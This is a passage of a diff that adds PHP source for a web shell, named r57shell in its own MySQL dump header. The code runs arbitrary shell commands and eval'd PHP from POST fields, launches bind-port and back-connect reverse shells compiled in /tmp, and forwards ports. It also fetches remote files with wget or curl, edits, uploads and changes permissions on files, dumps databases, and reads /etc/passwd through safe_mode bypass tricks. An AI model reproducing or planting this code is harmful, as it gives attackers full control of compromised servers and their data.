+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* display information */
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('/sbin/sysctl -n kern.ostype');
+$bsd2 = ex('/sbin/sysctl -n kern.osrelease');
+$lin1 = ex('/sbin/sysctl -n kernel.ostype');
+$lin2 = ex('/sbin/sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir."<br>";
+echo "</font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f  = base64_decode($c1);
+$f .= base64_decode($c2);
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* find text */
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* chmod/chown/chgrp */
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* make */
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* edit file */
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name size=85 value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd size=85 value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* save file */
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* port bind C */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* port bind Perl */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* back connect Perl */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* back connect C */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* datapipe perl */
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* datapipe C */
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* alias execute */
+if (!empty($_POST['alias']))
+ {
+ foreach ($aliases as $alias_name=>$alias_cmd) {
+                                               if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
+                                               }
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* file upload */
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* file upload from remote host */
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $p2=which("wget");
+ if(empty($p2)) $p2="wget";
+ $_POST['cmd'] = $p2." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+
+ case fetch:
+ $p2=which("fetch");
+ if(empty($p2)) $p2="fetch";
+ $_POST['cmd']= $p2." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+
+ case lynx:
+ $p2=which("lynx");
+ if(empty($p2)) $p2="lynx";
+ $_POST['cmd']= $p2." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+
+ case links:
+ $p2=which("links");
+ if(empty($p2)) $p2="links";
+ $_POST['cmd']= $p2." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+
+ case GET:
+ $p2=which("GET");
+ if(empty($p2)) $p2="GET";
+ $_POST['cmd']= $p2." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+
+ case curl:
+ $p2=which("curl");
+ if(empty($p2)) $p2="curl";
+ $_POST['cmd']= $p2." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* command execute */
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<div align=center><textarea name=report cols=121 rows=15>";
+
+// safe_mode On
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':  // dir listing
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){ // WINDOWS STYLE
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ // UNIX STYLE
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+
+  case 'test2':
+  include($_POST['test2_file']);
+  break;
+
+  case 'test3':
+  $db = @mysql_connect('localhost',$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while($r_sql = @mysql_fetch_array($r)) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+ } // end : switch($_POST['cmd'])
+
+} // end : if($safe_mode)
+
+// safe_mode Off
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump"))
+{
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }
+
+
+}
+
+// �� ������� �� �����
+if ($_POST['cmd']=="php_eval")
+ {
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* mysql ���� */
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     // ���� � �����
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= "# homepage: http://rst.void.ru\r\n";
+     $sql1 .= "# ---------------------------------\r\n";
+     $sql1 .= "#     date : ".date ("j F Y g:i")."\r\n";
+     $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
+     $sql1 .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     // �������� ����� ������� �������� ��������� �������
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     $sql2 = '';
+
+     // �������� ������ �������
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while ($row = @mysql_fetch_assoc($res)) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    // ����� � ���� ��� ������� � �������
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    } // end if(@mysql_select_db($_POST['mysql_db'],$db))
+
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   } // end if($db)
+  else echo "[-] ERROR! Can't connect to mysql server";
+ } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
+ } // end if ($_POST['cmd']=="mysql_dump")
+
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+//////// start table
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* command execute form */
+if(!$safe_mode){
+echo "<form name=command method=post>";
+echo $table_up1; echo $lang[$language.'_text2']; echo $table_up2;
+echo $font;
+echo "<b>".ws(1).$lang[$language.'_text3'].$arrow.ws(4)."</b>";
+echo "<input type=text name=cmd size=85>".ws(2)."<br>";
+echo "<b>".ws(1).$lang[$language.'_text4'].$arrow.ws(4)."</b>";
+echo "<input type=text name=dir size=85 value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* safe_mode form */
+if($safe_mode){
+echo "<form name=safe_ls method=post>";
+echo $table_up1; echo $lang[$language.'_text28']; echo $table_up2;
+echo $font;
+// dir
+echo "<b>".ws(1).$lang[$language.'_text4'].$arrow.ws(4)."</b>";
+echo "<input type=text name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=safe_dir>";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt6']." \"></form>";
+echo "<form name=safe_cat method=post>";
+echo "<b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
+echo "<input type=text name=file size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=safe_file>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt7']." \"></font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* edit_file form */
+echo "<form name=edit_file method=post>";
+echo $table_up1; echo $lang[$language.'_text42']; echo $table_up2;
+// dir
+echo $font;
+echo "<b>".$lang[$language.'_text43'].$arrow.ws(4)."</b>";
+echo "<input type=text name=e_name size=85 value=";
+echo (!empty($_POST['e_name'])?($_POST['e_name']):($dir));
+echo ">";
+echo "<input type=hidden name=cmd size=85 value=edit_file>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt11']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* mk/del dir/file form */
+if($safe_mode){
+echo "<form name=mk method=post>";
+echo $table_up1; echo $lang[$language.'_text57']; echo $table_up2;
+// dir
+echo $font;
+echo ws(24)."<b>".$lang[$language.'_text58'].$arrow.ws(4)."</b>";
+echo "<input type=text name=mk_name size=54 value=";
+echo (!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"));
+echo ">";
+echo ws(2)."<select name=action>";
+echo "<option value=create>".$lang[$language.'_text65']."</option>";
+echo "<option value=delete>".$lang[$language.'_text66']."</option>";
+echo "</select>";
+echo ws(2)."<select name=what>";
+echo "<option value=file>".$lang[$language.'_text59']."</option>";
+echo "<option value=dir>".$lang[$language.'_text60']."</option>";
+echo "</select>";
+echo "<input type=hidden name=cmd size=85 value=mk>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt13']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* change perm form */
+if($safe_mode && $unix){
+echo "<form name=ch method=post>";
+echo $table_up1; echo $lang[$language.'_text67']; echo $table_up2;
+// dir
+echo $font;
+echo ws(14)."<b>".$lang[$language.'_text69'].$arrow.ws(4)."</b>";
+echo "<input type=text name=param1 size=40 value=";
+echo (($_POST['param1'])?($_POST['param1']):("filename"));
+echo ">";
+echo ws(2)."<b>".$lang[$language.'_text70'].$arrow.ws(4)."</b>";
+echo "<input type=text name=param2 size=26 value=";
+echo (($_POST['param2'])?($_POST['param2']):("0777"));
+echo " title='".$lang[$language.'_text71']."'><br>";
+echo "<input type=hidden name=cmd size=85 value=ch_>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(15)."<b>".$lang[$language.'_text68'].$arrow.ws(4)."</b>";
+echo ws(2)."<select name=what>";
+echo "<option value=mod>CHMOD</option>";
+echo "<option value=own>CHOWN</option>";
+echo "<option value=grp>CHGRP</option>";
+echo "</select>";
+echo ws(87)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* aliases form */
+if(!$safe_mode){
+echo "<form name=aliases method=POST>";
+echo $table_up1; echo $lang[$language.'_text7']; echo $table_up2;
+echo $font;
+echo "<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>";
+echo "<select name=alias>";
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ echo "<option>$alias_name</option>";
+ }
+ echo "</select>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* search text form */
+echo "<form name=search_text method=post>";
+echo $table_up1; echo $lang[$language.'_text54']; echo $table_up2;
+echo $font;
+echo ws(5)."<b>".$lang[$language.'_text52'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_text size=85 value=\"text\"><br>";
+echo ws(8)."<b>".$lang[$language.'_text53'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_dir size=85 value=".$dir."> * ( /root;/home;/tmp )<br>";
+echo ws(5)."<b>".$lang[$language.'_text55'].$arrow.ws(4)."</b>";
+echo "<input type=checkbox name=m value=1 id=m>";
+echo "<input type=text name=s_mask size=82 value=.txt;.php>  * ( .txt;.php;.htm )";
+echo "<input type=hidden name=cmd size=85 value=search_text>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<br><div align=center><input type=submit name=submit value=\" ".$lang[$language.'_butt12']." \"></div>";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* search text with find form */
+echo "<form name=search_text method=post>";
+echo $table_up1; echo $lang[$language.'_text76']; echo $table_up2;
+echo $font;
+echo ws(5)."<b>".$lang[$language.'_text72'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_text size=85 value=\"text\"><br>";
+echo ws(8)."<b>".$lang[$language.'_text73'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_dir size=85 value=".$dir."> * ( /root;/home;/tmp )<br>";
+echo ws(6)."<b>".$lang[$language.'_text74'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_mask size=85 value=*.[hc]>".ws(1).$lang[$language.'_text75'];
+echo "<input type=hidden name=cmd size=85 value=find_text>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<br><div align=center><input type=submit name=submit value=\" ".$lang[$language.'_butt12']." \"></div>";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* php eval form */
+echo "<form name=php method=post>";
+echo $table_up1; echo $lang[$language.'_text32']; echo $table_up2;
+echo $font;
+echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=php_eval>";
+echo "<br>".ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* php safe_mode break test 1 form */
+if($safe_mode&&$curl_on)
+{
+echo "<form name=test1 method=post>";
+echo $table_up1; echo $lang[$language.'_text33']; echo $table_up2;
+echo $font;
+echo "<b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test1_file size=85 value=";
+echo (!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=test1>";
